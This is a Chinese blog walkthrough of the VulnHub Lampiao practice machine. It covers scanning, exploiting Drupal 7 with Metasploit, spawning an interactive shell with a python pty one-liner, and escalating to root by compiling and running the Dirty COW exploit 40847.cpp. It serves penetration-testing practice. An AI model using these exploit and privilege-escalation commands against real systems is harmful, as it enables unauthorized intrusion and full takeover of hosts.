Lampiao

最新推荐文章于 2024-01-16 10:41:31 发布
最新推荐文章于 2024-01-16 10:41:31 发布
阅读量699 收藏
点赞数

方法一:
1.nmap扫描存活主机并确认靶机,我的是153
在这里插入图片描述
在这里插入图片描述
2.扫描开放端口
在这里插入图片描述

3.先访问1898端口,发现是个网站
在这里插入图片描述
4.用nikto扫描一下网站用那些目录或文件
在这里插入图片描述
访问UPGRADE.txt,提示升级drupal的信息
在这里插入图片描述
Drupal7有一个远程执行漏洞
5.用msfconsole工具进行攻击
1.搜索模块
在这里插入图片描述
2.使用模块
3.查看并设置选项
在这里插入图片描述
6.攻击

6.得到shell
在meterpreter >后加shell得到shell,在添加python -c ‘import pty; pty.spawn("/bin/bash")’
在创建完成后,我们此时就可以运行su命令了。(并且界面提示也变得更加友好)

7.提权
1.查看靶机内核版本uname -a
在这里插入图片描述
2.用./linux-exploit-suggester.sh查看可以攻击的脚本
在这里插入图片描述
我们选择dirtycow2攻击
用searchapolit进行搜索40847.cpp这个攻击脚本,将这件脚本复制到桌面,
再用scp上传到靶机scp root@192.168.34.189:/root/Desktop/40847.cpp ./
编译cpp文件:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
./docw -s 即可得到root权限
在这里插入图片描述

weixin_43841336
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场练习之Lampiao
qq_52360932的博客
02-28 5999
Lampiao靶场练习
靶机:Lampiao
AzVoidSUN的博客
07-06 733
下载地址 https://www.vulnhub.com/entry/lampiao-1,249/ 选择NAT模式或桥接模式都可以 目标 得到root权限 信息收集 kali的ip是192.168.174.129 扫下c段 发现靶机ip 192.168.174.4 开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西 dirb扫下目录 发现扫不到东西 ...
Lampiao(dirtycow)脏牛漏洞复现
weixin_34075268的博客
06-13 710
nmap扫描内网80端口发现目标主机 nmap -sP -p 80 192.168.31.0/24 扫描发现目标主机开放22端口、并且 1898端口开放http服务 御剑扫描目录并访问之后发现存在目录遍历漏洞 且部分文件可以下载 下载后浏览发现cms版本 寻找i相关漏洞...
渗透项目(二):Lampiao
Ays.Ie的博客
10-16 1161
2022.10.16更新第二个渗透项目Lampiao,步骤很详细,继续努力!
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器。
Lampiao.zip
06-22
在这个"Lampiao.zip"压缩包中,我们可以看到几个与渗透测试相关的文件,包括"Lampiao.mf"、"Lampiao.ovf"和"Lampiao-disk1.vmdk"。 "Lampiao.mf"可能是一个Manifest文件,通常在Java或Android应用中用于记录组件和...
vulhub渗透测试靶机学习1
08-08
在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的分析和攻击。 首先,我们关注的是Lampiao靶机。这个靶机可以从VulnHub下载,地址是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机Lampiao:1 writeup
xingjinhao123的博客
01-21 4208
下载地址:https://www.vulnhub.com/entry/lampiao-1,249/ 信息搜集 获取IP地址 扫描开放的端口 80端口 80端口没有任何发现 1898端口 发现启动了Drupal 7 列举目录 发现有熟悉的rebots.txt 在CHANGELOG.txt文件里面发现了Drupal 的版本是7.54 getshell 通过Kali中的Searchsploit工具可以确定Drupal 7.5...
Lampiao 靶机练习
SYJ_361的博客
02-28 4280
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
2-vulnhub Lampiao实战
weixin_45345568的博客
04-16 349
2-vulnhub Lampiao实战 简介: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.3.13(桥接模式自动获取) 一、信息搜集 1.扫描ip 2.扫描端口这里使用nmap进行: (开始只扫描出来80和22未果,后来反应过来,有可能网站还有其它端口可以访问,因为-sS参数是扫描常用的1000以内的端口号。于是用-p-参数:nmap -p- 192.168.3.13) 这里有三个端口先访问网站,发现如下是
【靶机实战记录--lampiao
最新发布
qq_74240553的博客
01-16 1451
脏牛漏洞提权,vulnhub靶场
lampiao靶机实验实战演练
lianliandad的博客
11-24 1210
好好学习
2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2
bmxch的博客
05-05 576
前言:我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell这次我们用框架来尝试两种不同方法拿到shell思路清晰,先说步骤1.信息收集得到可以用的站点漏洞2.通过AWVS+xray或xray和bs解析出目录报告,得到我们能利用exp或poc,当然因为AWVS爬虫功能并不免费,所以最好联动,也可以和其他工具联动,思想是自动化的思想,得到可以利用的框架漏洞。3.得到可以用的poc或exp直接利用提权,如果又cve更好。
T_lampiao靶机
Finch_Alan的博客
02-08 926
d
VulnHub系列之Lampiao渗透测试
Flynn的博客
04-26 430
Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 您想继续在自己的实验室中进行黑客攻击吗? 试试这个全新的易受攻击的机器!“兰皮奥 1”。
Lampiao靶机渗透测试
Huangshanyoumu的博客
04-19 1163
一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.1.120 发现开启了 22 ssh 服务 80、1898 web 服务,drupal7 框架 二、漏洞挖掘 1.查看对方web服务 访问 80 端口: 访问 1898 发现 drupal 框架 发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2 发现有两个文件,尝试访问 发现 audio.m4a 是一段音频,内
【渗透测试】VulnHub-Lampiao
m0_52923241的博客
10-26 314
VulnHub-Lampiao渗透VulnHub-Lampiao详细解题步骤知识点总结Linux中查看进程状态信息命令:psCVE-2018-7600——Drupaldirtycow脏牛提权Python SimpleHTTPServer:linux远程下载文件到本地scpftpwgetGCC编译常用工具篇Dirb:Kali Linux下web网站目录爆破工具cewl:密码攻击工具wget:Linux下载文件的工具 VulnHub-Lampiao详细解题步骤 VulnHub-Lampiao详细解题步骤 nma
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值